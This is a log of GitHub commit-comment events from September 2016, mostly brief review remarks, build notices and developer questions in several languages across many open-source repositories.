{"id":"4504242566","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18868265,"position":null,"line":null,"path":null,"commit_id":"b7faea8d6216186e91698c6dc42cbdb4c3a05be8","created_at":"2016-09-01T18:18:50Z","updated_at":"2016-09-01T18:18:50Z","body":"Related to: backdrop/backdrop-issues#450 "}},"created_at":"2016-09-01T18:18:50Z"}
{"id":"4504246542","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"andrewrk/zig"},"payload":{"comment":{"id":18868274,"position":null,"line":null,"path":null,"commit_id":"f18e34c2c6b7884a76d98d86b41857044dbe0f06","created_at":"2016-09-01T18:19:36Z","updated_at":"2016-09-01T18:19:36Z","body":"Also TODO is rendering things other than function declarations, such as structs, enums, unions, and typedefs."}},"created_at":"2016-09-01T18:19:36Z"}
{"id":"4504249401","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18868281,"position":1,"line":0,"path":"js/js.translator/testData/rtti/cases/collectionClassesIsCheck.kt","commit_id":"5de70252213be5975852f4c511f037e1cf629ded","created_at":"2016-09-01T18:20:06Z","updated_at":"2016-09-01T18:20:06Z","body":"|`line 4`|\n|---|\nimport is not needed anymore"}},"created_at":"2016-09-01T18:20:06Z"}
{"id":"4504249491","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":18868283,"position":null,"line":null,"path":null,"commit_id":"7f3f2957c614d44beb8d5df07ff47a36070cfd40","created_at":"2016-09-01T18:20:08Z","updated_at":"2016-09-01T18:20:08Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://54.234.50.226:8080/ui#review:id=61)"}},"created_at":"2016-09-01T18:20:08Z"}
{"id":"4504250189","type":"CommitCommentEvent","actor":{"login":"ssweeny"},"repo":{"name":"ssweeny/snap-confine"},"payload":{"comment":{"id":18868284,"position":7,"line":226,"path":"src/mount-support.c","commit_id":"3094715f1e1fd49e216b0f1d3be24408ad912019","created_at":"2016-09-01T18:20:15Z","updated_at":"2016-09-01T18:20:15Z","body":"Yes, I discovered that the hard way "}},"created_at":"2016-09-01T18:20:15Z"}
{"id":"4504252664","type":"CommitCommentEvent","actor":{"login":"Doralitze"},"repo":{"name":"Technikradio/Node2"},"payload":{"comment":{"id":18868291,"position":58,"line":86,"path":"src/core/org/technikradio/node/core/CorePlugin.java","commit_id":"02f54f5b9756fc332022384e93a969eb2b8472d6","created_at":"2016-09-01T18:20:40Z","updated_at":"2016-09-01T18:20:40Z","body":"Of course this is temporary to have something to test the WSB with."}},"created_at":"2016-09-01T18:20:40Z"}
{"id":"4504252823","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18868292,"position":12,"line":55,"path":"include/vrv/system.h","commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-01T18:20:41Z","updated_at":"2016-09-01T18:20:41Z","body":"Isn't this left from a previous temporary fix ?"}},"created_at":"2016-09-01T18:20:41Z"}
{"id":"4504254430","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18868297,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T18:20:58Z","updated_at":"2016-09-01T18:20:58Z","body":"Congrats! "}},"created_at":"2016-09-01T18:20:58Z"}
{"id":"4504255190","type":"CommitCommentEvent","actor":{"login":"my-instantcms"},"repo":{"name":"instantsoft/icms2"},"payload":{"comment":{"id":18868300,"position":null,"line":null,"path":null,"commit_id":"74bae5305c1c4554f1a469515fac956cd11a1ee3","created_at":"2016-09-01T18:21:08Z","updated_at":"2016-09-01T18:21:08Z","body":"Ок, в этом же файле, в строке 549 есть похожая функция, только я использовать не смог\r\n```\r\n* Аналогично функции array_column из PHP 5.5\r\n *\r\n * @param type $collection\r\n * @param type $key\r\n * @param type $value\r\n * @return type\r\n */\r\nfunction array_collection_to_list($collection, $key, $value=false){\r\n```"}},"created_at":"2016-09-01T18:21:08Z"}
{"id":"4504256477","type":"CommitCommentEvent","actor":{"login":"Doralitze"},"repo":{"name":"Technikradio/Node2"},"payload":{"comment":{"id":18868303,"position":119,"line":155,"path":"src/core/org/technikradio/node/core/WorksheetBrowser.java","commit_id":"02f54f5b9756fc332022384e93a969eb2b8472d6","created_at":"2016-09-01T18:21:21Z","updated_at":"2016-09-01T18:21:21Z","body":"I still don't know why these lines aren't working."}},"created_at":"2016-09-01T18:21:21Z"}
{"id":"4504258203","type":"CommitCommentEvent","actor":{"login":"AlenOsmanagic"},"repo":{"name":"AlenOsmanagic/Zadace"},"payload":{"comment":{"id":18868307,"position":null,"line":null,"path":null,"commit_id":"31afd54e176f805e5d939aa4deefa91a9eab5726","created_at":"2016-09-01T18:21:40Z","updated_at":"2016-09-01T18:21:40Z","body":"Ok može. Hvala. Keno mi sad govori da se znalo desiti na tom hackintoshu da\nizbaci neki error kao gdje se spominje Objective C. Isto tako, on kaže da\nje na tom hackintoshu starija verzija Xcode. Uglavnom, hvala ti na\nodgovoru. Pokusat cu to završiti. Ako gdje zapnem, javim se. LP.\n\nDana 31.08.2016. 22:52, osoba \"irfanG\" <notifications@github.com> je\nnapisala:\n\n> koji error ti tacno izbacuje?\n>\n> bilo bi korisno da, kao i ostali pokusas da commitas kod preko x-code a ne\n> da upload fajl? ja sam otvorio ovaj tvoj projekat i pocisticu ti da vidis\n> kako treba da izgleda (otprilike)\n>\n> imageView ti treba biti klase UIImageView a ne `UIImage\n>\n> jedna od gresaka ti je bila sto si imao viska }\n>\n> takodjer, referencirao si nameNameLabelu storyboard a u ViewControlleru\n> ti je bilo `mealNameLabel\n>\n> ja cu ti sad commit projekat a ti mozes da zavrsis onda ostatak, ok?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/AlenOsmanagic/Zadace/commit/31afd54e176f805e5d939aa4deefa91a9eab5726#commitcomment-18853589>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATLjieXsozc915btM9M05vTIUis75lhoks5qlel9gaJpZM4JyDPD>\n> .\n>\n"}},"created_at":"2016-09-01T18:21:40Z"}
{"id":"4504259660","type":"CommitCommentEvent","actor":{"login":"lucas-mancini"},"repo":{"name":"juanomgpt/iso-10383"},"payload":{"comment":{"id":18868312,"position":null,"line":null,"path":null,"commit_id":"f9211dbf4d0fa0b1568758b74d8f63aba7067d5c","created_at":"2016-09-01T18:21:56Z","updated_at":"2016-09-01T18:21:56Z","body":"What about versioning number? I am not aware of what is the convention in these cases.. Should we use 1.0.0 or 0.1.0 or other.."}},"created_at":"2016-09-01T18:21:56Z"}
{"id":"4504259990","type":"CommitCommentEvent","actor":{"login":"bruno-ana"},"repo":{"name":"bruno-ana/Teste-de-Software"},"payload":{"comment":{"id":18868313,"position":null,"line":null,"path":null,"commit_id":"a0a4bc2fbe87bfc7eae97347b674a13b4db51599","created_at":"2016-09-01T18:22:00Z","updated_at":"2016-09-01T18:22:00Z","body":"Seleção do arquivo CSV\r\nSET !DATASOURCE \"C:\\\\Users\\\\db1007197\\\\Documents\\\\iMacros\\\\Datasources\\\\Arquivo CPF_01.csv\"\r\n\r\nSeleção da coluna do arquivo CSV\r\nTAG POS=1 TYPE=INPUT:TEXT FORM=ID:form ATTR=ID:cpf CONTENT={{!COL1}}\r\n\r\nInclusão de espera\r\nWAIT SECONDS=2"}},"created_at":"2016-09-01T18:22:00Z"}
{"id":"4504262619","type":"CommitCommentEvent","actor":{"login":"refractionpcsx2"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":18868316,"position":null,"line":null,"path":null,"commit_id":"d78d515acb04a3bfbf0f1dca125fbb2756cbbe9d","created_at":"2016-09-01T18:22:30Z","updated_at":"2016-09-01T18:22:30Z","body":"> Hey, I tried it briefly (uncommented the table entry, of course) but I still get unknown opcodes and the assert. http://i.imgur.com/9c6zk18.png\r\n\r\ndid you uncomment /*rpsxCOP2*/ in the table?"}},"created_at":"2016-09-01T18:22:30Z"}
{"id":"4504262809","type":"CommitCommentEvent","actor":{"login":"geekosaur"},"repo":{"name":"xmonad/xmonad-contrib"},"payload":{"comment":{"id":18868317,"position":null,"line":null,"path":null,"commit_id":"28e9f8bce781e6511b75a1c1e35f1cea4cecfefe","created_at":"2016-09-01T18:22:32Z","updated_at":"2016-09-01T18:22:32Z","body":"On Thu, Sep 1, 2016 at 2:17 PM, Bogdan Sinitsyn <notifications@github.com>\nwrote:\n\n> But anyway *rect* cache should not be global, shouldn't it?\n>\n\nWhat is the strut cache but a list of XIDs and rects? Again, there is a\ndistinction between the known struts (global so we don't have to query all\nwindows to get it constantly) and whether they are currently applied (this\nshould *not* be cached: it's cheap enough to recompute based on the global\nstrut cache and local edge activation state on every relayout as long as we\ndon't have to query the X server for any of it, and you can't reliably keep\nthat cache consistent).\n\n\n-- \nbrandon s allbery kf8nh                               sine nomine associates\nallbery.b@gmail.com                                  ballbery@sinenomine.net\nunix, openafs, kerberos, infrastructure, xmonad        http://sinenomine.net\n"}},"created_at":"2016-09-01T18:22:32Z"}
{"id":"4504262842","type":"CommitCommentEvent","actor":{"login":"jemise111"},"repo":{"name":"jemise111/react-native-swipe-list-view"},"payload":{"comment":{"id":18868318,"position":51,"line":406,"path":"README.md","commit_id":"1c692b549d9f39d4d408607e77e319f6a5652644","created_at":"2016-09-01T18:22:32Z","updated_at":"2016-09-01T18:22:32Z","body":"@npomfret passing a positive value like\r\n```\r\npreviewOpenValue={100}\r\n```\r\nshould do the trick. This number corresponds to the ```translateX``` value of the wrapper view. So positive swipes to the right, negative swipes to the left.\r\n\r\nLet me know if that doesn't work!"}},"created_at":"2016-09-01T18:22:32Z"}
{"id":"4504271954","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18868338,"position":null,"line":null,"path":null,"commit_id":"cb216b9f9bd766654c692517a323adaca6cdc533","created_at":"2016-09-01T18:24:15Z","updated_at":"2016-09-01T18:24:15Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.239.cb216b9f9bd766654c692517a323adaca6cdc533](http://build.palaso.org/viewLog.html?buildId=76371&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1493, ignored: 17 Build time: 00:07:23"}},"created_at":"2016-09-01T18:24:15Z"}
{"id":"4504274948","type":"CommitCommentEvent","actor":{"login":"Zodzie"},"repo":{"name":"mozilla/BrowserQuest"},"payload":{"comment":{"id":18868346,"position":null,"line":null,"path":null,"commit_id":"af32d247cac3495ca430d0effbb88dd5f3250b2c","created_at":"2016-09-01T18:24:50Z","updated_at":"2016-09-01T18:24:50Z","body":"@THENEWGAMECREATOR to play to test it, seems like it works: http://browserquest.mozilla.org/\r\n\r\nIf you have downloaded the code, make sure you have the server running before your run the client - client must also be directed to your server location"}},"created_at":"2016-09-01T18:24:50Z"}
{"id":"4504276699","type":"CommitCommentEvent","actor":{"login":"Viltzu"},"repo":{"name":"Viltzu/GSS-to-N-SPC"},"payload":{"comment":{"id":18868355,"position":null,"line":null,"path":null,"commit_id":"f7bf09e0c9c8b632b8adaa85d8b67e69384dd6f6","created_at":"2016-09-01T18:25:09Z","updated_at":"2016-09-01T18:25:09Z","body":"Second rewrite* (Third version)"}},"created_at":"2016-09-01T18:25:09Z"}
{"id":"4504278459","type":"CommitCommentEvent","actor":{"login":"MaksSlesarenko"},"repo":{"name":"MaksSlesarenko/cphalcon"},"payload":{"comment":{"id":18868362,"position":null,"line":null,"path":null,"commit_id":"d90cebdb36f72a8aec5ec979ffd9a60d19196042","created_at":"2016-09-01T18:25:26Z","updated_at":"2016-09-01T18:25:26Z","body":"Regexp is taken from here [http://stackoverflow.com/questions/15233953/php-split-string-on-comma-but-not-when-between-braces-or-quotes](http://stackoverflow.com/questions/15233953/php-split-string-on-comma-but-not-when-between-braces-or-quotes)"}},"created_at":"2016-09-01T18:25:26Z"}
{"id":"4504278472","type":"CommitCommentEvent","actor":{"login":"kaneki1985"},"repo":{"name":"kaneki1985/GoIv"},"payload":{"comment":{"id":18868363,"position":null,"line":null,"path":null,"commit_id":"0ed31bd8347d78bc6a65f7399267181b6b6c69c8","created_at":"2016-09-01T18:25:26Z","updated_at":"2016-09-01T18:25:26Z","body":"0ed31bd"}},"created_at":"2016-09-01T18:25:26Z"}
{"id":"4504279688","type":"CommitCommentEvent","actor":{"login":"waldyrious"},"repo":{"name":"tldr-pages/tldr"},"payload":{"comment":{"id":18868365,"position":22,"line":23,"path":"pages/common/zip.md","commit_id":"be0fbaec973d1582be38c8ced94b899fdc4076eb","created_at":"2016-09-01T18:25:38Z","updated_at":"2016-09-01T18:25:38Z","body":"That's a good point. Can you please copy your comment over to #1018, so discussion is centralized?"}},"created_at":"2016-09-01T18:25:38Z"}
{"id":"4504282747","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18868377,"position":null,"line":null,"path":null,"commit_id":"2a6e43c2255e3942ea67d05643ad0171e8098fad","created_at":"2016-09-01T18:26:11Z","updated_at":"2016-09-01T18:26:11Z","body":"|`js/js.translator/testData/kotlin_lib.js:793`|\n|---|\n@{b18c3520-a060-4f5a-9429-58c82570c766,Zalim Bashorov} is this comment also related to List not being array-like object and should be also removed?"}},"created_at":"2016-09-01T18:26:11Z"}
{"id":"4504282807","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":18868380,"position":null,"line":null,"path":null,"commit_id":"aefb21790da4cf94a970946738a82061df8857da","created_at":"2016-09-01T18:26:12Z","updated_at":"2016-09-01T18:26:12Z","body":"OK, I am looking at it and will make a few changes"}},"created_at":"2016-09-01T18:26:12Z"}
{"id":"4504284994","type":"CommitCommentEvent","actor":{"login":"jaiswalp"},"repo":{"name":"Planteome/go-site-xrefs-fork"},"payload":{"comment":{"id":18868389,"position":null,"line":null,"path":null,"commit_id":"afcbe14a45cc4e25db3865035c42de8a48e637ac","created_at":"2016-09-01T18:26:35Z","updated_at":"2016-09-01T18:26:35Z","body":"we might have to redirect  them to Jaiswal lab  or some site we create in Planteome on the source data.\r\n"}},"created_at":"2016-09-01T18:26:35Z"}
{"id":"4504285604","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"quozl/cforth-1"},"payload":{"comment":{"id":18868391,"position":null,"line":null,"path":null,"commit_id":"dedba89249bd4a1f5695d9c037f827ab4c5fdefc","created_at":"2016-09-01T18:26:42Z","updated_at":"2016-09-01T18:26:42Z","body":"The **'c** notation is in keeping with Forth 2012 - see <cnum> on page 35 of http://www.forth200x.org/documents/forth-2012.pdf\r\n\r\nBut **'c** is wrong; it should be **'c'**.  Wanna fix it?\r\n\r\nInput number conversion accepts the new syntax correctly - you can write **'a'** instead of **[char] a**.  Similarly **$deadbeef** for hex and **#102345** for decimal."}},"created_at":"2016-09-01T18:26:42Z"}
{"id":"4504287100","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":18868399,"position":null,"line":null,"path":null,"commit_id":"e10f329559bbe9e8699375c9e019fe72a1e2cfaa","created_at":"2016-09-01T18:26:58Z","updated_at":"2016-09-01T18:26:58Z","body":"++"}},"created_at":"2016-09-01T18:26:58Z"}
{"id":"4504288131","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18868404,"position":36,"line":36,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T18:27:10Z","updated_at":"2016-09-01T18:27:10Z","body":"> There is also no guarantee the token is not expired due to some reason.\r\n\r\ni didn't find any indication in js code of a time when the token will be removed the local storage.\r\n> This also makes it impossible to use different credentials in future.\r\n\r\ncan be changed to store the token in `curiositystream/<email>`"}},"created_at":"2016-09-01T18:27:10Z"}
{"id":"4504293658","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"degree9/boot-semver"},"payload":{"comment":{"id":18868416,"position":33,"line":121,"path":"src/degree9/boot_semver.clj","commit_id":"f371f5740d29aaeabae9de21b3d20c028e24662d","created_at":"2016-09-01T18:28:11Z","updated_at":"2016-09-01T18:28:11Z","body":"This is neat!"}},"created_at":"2016-09-01T18:28:11Z"}
{"id":"4504296729","type":"CommitCommentEvent","actor":{"login":"npomfret"},"repo":{"name":"jemise111/react-native-swipe-list-view"},"payload":{"comment":{"id":18868423,"position":51,"line":406,"path":"README.md","commit_id":"1c692b549d9f39d4d408607e77e319f6a5652644","created_at":"2016-09-01T18:28:44Z","updated_at":"2016-09-01T18:28:44Z","body":"Silly me, thank you."}},"created_at":"2016-09-01T18:28:44Z"}
{"id":"4504297532","type":"CommitCommentEvent","actor":{"login":"flyboarder"},"repo":{"name":"degree9/boot-semver"},"payload":{"comment":{"id":18868425,"position":33,"line":121,"path":"src/degree9/boot_semver.clj","commit_id":"f371f5740d29aaeabae9de21b3d20c028e24662d","created_at":"2016-09-01T18:28:54Z","updated_at":"2016-09-01T18:28:54Z","body":"haha not yet working ;) will be in `1.4`"}},"created_at":"2016-09-01T18:28:54Z"}
{"id":"4504297776","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18868427,"position":null,"line":null,"path":null,"commit_id":"35f9904dbe0600f4e22a4b15909dacb789ffbdab","created_at":"2016-09-01T18:28:57Z","updated_at":"2016-09-01T18:28:57Z","body":"Ok I just checked the db script and there is a unique constraint on the username field, so this field will never be duplicated"}},"created_at":"2016-09-01T18:28:57Z"}
{"id":"4504302496","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18868435,"position":36,"line":36,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T18:29:49Z","updated_at":"2016-09-01T18:29:49Z","body":">i didn't find any indication in js code of a time when the token will be removed the local storage.\r\n\r\nThis guarantees nothing. For instance, it may be revoked by server side or some failure may happen."}},"created_at":"2016-09-01T18:29:49Z"}
{"id":"4504305570","type":"CommitCommentEvent","actor":{"login":"dustinbuice18"},"repo":{"name":"dustinbuice18/clip-snip-and-curl"},"payload":{"comment":{"id":18868439,"position":null,"line":null,"path":null,"commit_id":"c91cf3e604ec6292f7fd3891fde6a74cd73a6cd5","created_at":"2016-09-01T18:30:20Z","updated_at":"2016-09-01T18:30:20Z","body":"Yes"}},"created_at":"2016-09-01T18:30:20Z"}
{"id":"4504307113","type":"CommitCommentEvent","actor":{"login":"iraqforlife"},"repo":{"name":"iraqforlife/Chart.js"},"payload":{"comment":{"id":18868444,"position":null,"line":null,"path":null,"commit_id":"4f947002601809b01b5a4bd3eae61b5d6e331ac5","created_at":"2016-09-01T18:30:34Z","updated_at":"2016-09-01T18:30:34Z","body":"When the text is too long and there is a rotation:\r\n![t1](https://cloud.githubusercontent.com/assets/10884133/18179458/84fa380e-7050-11e6-875e-dea730b4d6f1.png)\r\nbut if there is no rotation:\r\n![t2](https://cloud.githubusercontent.com/assets/10884133/18179461/869f8d80-7050-11e6-8017-e3d83f2a6810.png)\r\nWith the change:\r\n![t3](https://cloud.githubusercontent.com/assets/10884133/18179462/88518520-7050-11e6-9ecc-ac140041eb57.png)\r\n"}},"created_at":"2016-09-01T18:30:34Z"}
{"id":"4504309561","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18868454,"position":52,"line":52,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T18:30:59Z","updated_at":"2016-09-01T18:30:59Z","body":"so the prefered way is to login(additional request) for evey download(some sites limit the number of login times)."}},"created_at":"2016-09-01T18:30:59Z"}
{"id":"4504310337","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"wahani/modules"},"payload":{"comment":{"id":18868459,"position":null,"line":null,"path":null,"commit_id":"84d637d69283bdbfca60bd3b1dd8527d4e0add2c","created_at":"2016-09-01T18:31:10Z","updated_at":"2016-09-01T18:31:10Z","body":"[tests/testthat/test-module.R:45:6:](https://github.com/wahani/modules/blob/84d637d69283bdbfca60bd3b1dd8527d4e0add2c/tests/testthat/test-module.R#L45) *style:* **Commented code should be removed.**\n```r\n​    ## expect_false(exists(\".__T__as.environment:base\"))\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-01T18:31:10Z"}
{"id":"4504314330","type":"CommitCommentEvent","actor":{"login":"justinclift"},"repo":{"name":"sqlitebrowser/sqlitebrowser"},"payload":{"comment":{"id":18868467,"position":143,"line":401,"path":"CMakeLists.txt","commit_id":"8a9130883b9e89d57d33b6c3a0ee8ee59ce9957b","created_at":"2016-09-01T18:31:54Z","updated_at":"2016-09-01T18:31:54Z","body":"When I make this commit, I was only thinking about people building on Windows.  Completely forgot it would probably impact the Qt4 based nightly build, and may affect people on non-windows too. 😦 \r\n\r\nNon-windows seems better served to build using qmake though, instead of cmake.  At least... no-one has pointed out a benefit using cmake on *nix based systems yet (compared to qmake)."}},"created_at":"2016-09-01T18:31:54Z"}
{"id":"4504317100","type":"CommitCommentEvent","actor":{"login":"BurtHarris"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18868475,"position":null,"line":null,"path":null,"commit_id":"ce1108c87574dca0a47801bf4e7cf818aafae1b4","created_at":"2016-09-01T18:32:25Z","updated_at":"2016-09-01T18:32:25Z","body":"I'm afraid this isn't semantically correct.   `Array<T>` has lots of members that aren't required of an Iterator."}},"created_at":"2016-09-01T18:32:25Z"}
{"id":"4504320854","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"degree9/boot-semver"},"payload":{"comment":{"id":18868484,"position":39,"line":126,"path":"src/degree9/boot_semver.clj","commit_id":"f371f5740d29aaeabae9de21b3d20c028e24662d","created_at":"2016-09-01T18:33:02Z","updated_at":"2016-09-01T18:33:02Z","body":"you don't need this per se, as you can already use `generate` coming from the params (if I read it right)"}},"created_at":"2016-09-01T18:33:02Z"}
{"id":"4504329010","type":"CommitCommentEvent","actor":{"login":"pexcn"},"repo":{"name":"aa65535/okhttputils"},"payload":{"comment":{"id":18868502,"position":10,"line":56,"path":"src/main/java/utils/okhttp/request/ParamsBuilder.java","commit_id":"c072a9c8e58f4cea0683534438b97cf6b185e90a","created_at":"2016-09-01T18:34:31Z","updated_at":"2016-09-01T18:34:31Z","body":"@aa65535 请教个问题，请问是怎么把注释写成`{@code value}`这样的？是不是有什么工具可以这么弄？"}},"created_at":"2016-09-01T18:34:31Z"}
{"id":"4504329226","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18868503,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-01T18:34:33Z","updated_at":"2016-09-01T18:34:33Z","body":"@lucabrivio : a small midgame penalty for bishops and open files? Hmm, why not... There was a saying which went \"If Mihails Tāls has an open file, there will be mate\", so open files can serve many purposes :-)\r\n\r\nAnd it was not intended that the score grows back, thanks for the notice! I wrote the simpler version I could think about, but anyway since it is struggling at long times control I think I will put the test at priority -1 and maybe try something else.\r\n"}},"created_at":"2016-09-01T18:34:33Z"}
{"id":"4504329686","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"di8905/ttd"},"payload":{"comment":{"id":18868504,"position":5,"line":6,"path":"app/models/railway_station.rb","commit_id":"bcb9724264ed2837576a06111da4fe87d0aebbb0","created_at":"2016-09-01T18:34:39Z","updated_at":"2016-09-01T18:34:39Z","body":"Нельзя 2 ассоциации называть одинаково. Ведь когда ты к ним обратишься station.tickets, рельсы не поймут какую ассоциацию брать. Точнее, вторая запись переопределит первую и ты будешь всегда получть только билеты, где станция конечная. Измени названия ассоциаций, скажем на departure_tickets  и destination_tickets."}},"created_at":"2016-09-01T18:34:39Z"}
{"id":"4504331469","type":"CommitCommentEvent","actor":{"login":"allanjude"},"repo":{"name":"ScoobiFreeBSD/freebsd"},"payload":{"comment":{"id":18868507,"position":null,"line":null,"path":null,"commit_id":"2376fc13627db10a65bcab9d9091cbd8ff049e87","created_at":"2016-09-01T18:34:58Z","updated_at":"2016-09-01T18:34:58Z","body":"I like this idea, We should talk to the ports people and see what they prefer, then look at the boot menu side of it. The name of the menu option may need more consideration as well"}},"created_at":"2016-09-01T18:34:58Z"}
{"id":"4504332277","type":"CommitCommentEvent","actor":{"login":"hodrigohamalho"},"repo":{"name":"jbossdemocentral/jboss-datagrid-spark-analytics-demo"},"payload":{"comment":{"id":18868508,"position":null,"line":null,"path":null,"commit_id":"66d228b4dd1443e5dcbe9710aa7113ad29189cc1","created_at":"2016-09-01T18:35:09Z","updated_at":"2016-09-01T18:35:09Z","body":"Need to refer the EAP dependency on README file."}},"created_at":"2016-09-01T18:35:09Z"}
{"id":"4504336736","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"di8905/ttd"},"payload":{"comment":{"id":18868516,"position":2,"line":2,"path":"app/models/route.rb","commit_id":"b1489d0875ef342a0fa6e38856fbfff0f6c7dac6","created_at":"2016-09-01T18:35:58Z","updated_at":"2016-09-01T18:35:58Z","body":"В моделях принято сначала писать ассоциации, потом валидации и между этими блоками ставить пустую строку"}},"created_at":"2016-09-01T18:35:58Z"}
{"id":"4504337983","type":"CommitCommentEvent","actor":{"login":"timothy-king"},"repo":{"name":"CVC4/CVC4"},"payload":{"comment":{"id":18868521,"position":9,"line":38,"path":"src/options/didyoumean.cpp","commit_id":"3db673c6cc8140c17ae229da86102955dce72434","created_at":"2016-09-01T18:36:12Z","updated_at":"2016-09-01T18:36:12Z","body":"\"beautify\" is code for \"I ran clang-tidy on the file\". I'd really like to be able to run that in the future. The productivity and increased style consistency it gives is fairly substantial. I'll move this discussion to the devel list."}},"created_at":"2016-09-01T18:36:12Z"}
{"id":"4504338945","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18868525,"position":52,"line":52,"path":"youtube_dl/extractor/curiositystream.py","commit_id":"f096ec262544babf6ea23347160c1c550e4e157e","created_at":"2016-09-01T18:36:21Z","updated_at":"2016-09-01T18:36:21Z","body":"It's the only viable at the moment. Approach that stores session id/token/cookies should be carefully designed first to overcome aforementioned issues."}},"created_at":"2016-09-01T18:36:21Z"}
{"id":"4504341883","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"di8905/ttd"},"payload":{"comment":{"id":18868536,"position":3,"line":3,"path":"app/models/train.rb","commit_id":"b1489d0875ef342a0fa6e38856fbfff0f6c7dac6","created_at":"2016-09-01T18:36:55Z","updated_at":"2016-09-01T18:36:55Z","body":"А зачем здесь называть ассоциацию по-другому? Тут бы и стандартного belongs_to :route хватило.  Ведь у поезда только один маршрут."}},"created_at":"2016-09-01T18:36:55Z"}
{"id":"4504342041","type":"CommitCommentEvent","actor":{"login":"cosimoc"},"repo":{"name":"endlessm/ostree"},"payload":{"comment":{"id":18868538,"position":85,"line":2292,"path":"src/libostree/ostree-repo-commit.c","commit_id":"c33e8d48260397fb3c6e08f6e6afe2294cec50a1","created_at":"2016-09-01T18:36:56Z","updated_at":"2016-09-01T18:36:56Z","body":"Here you're losing the `G_IO_ERROR_NOT_FOUND` special case, and we will always propagate the error as far as I can see."}},"created_at":"2016-09-01T18:36:56Z"}
{"id":"4504342779","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"Birajhow/EDL"},"payload":{"comment":{"id":18868544,"position":null,"line":null,"path":null,"commit_id":"92bc6da6ca770e2ec73517ce46695cde74dbb115","created_at":"2016-09-01T18:37:03Z","updated_at":"2016-09-01T18:37:03Z","body":"Você fez os slides antes do `ARTIGO.md` ou eu me perdi aqui?"}},"created_at":"2016-09-01T18:37:03Z"}
{"id":"4504343266","type":"CommitCommentEvent","actor":{"login":"Th2BOOS"},"repo":{"name":"Th2BOOS/reboot"},"payload":{"comment":{"id":18868546,"position":1,"line":1,"path":"README.md","commit_id":"226b304e465e19e2f2679e917e982fd454c4eed9","created_at":"2016-09-01T18:37:10Z","updated_at":"2016-09-01T18:37:10Z","body":"اهلا وسهلا بكم بــ سورس ريبوت ➪reboot➪نعمل لخدمتكم"}},"created_at":"2016-09-01T18:37:10Z"}
{"id":"4504344057","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"di8905/ttd"},"payload":{"comment":{"id":18868547,"position":4,"line":4,"path":"app/models/train.rb","commit_id":"b1489d0875ef342a0fa6e38856fbfff0f6c7dac6","created_at":"2016-09-01T18:37:18Z","updated_at":"2016-09-01T18:37:18Z","body":"А поезд-то каким боком здесь? "}},"created_at":"2016-09-01T18:37:18Z"}
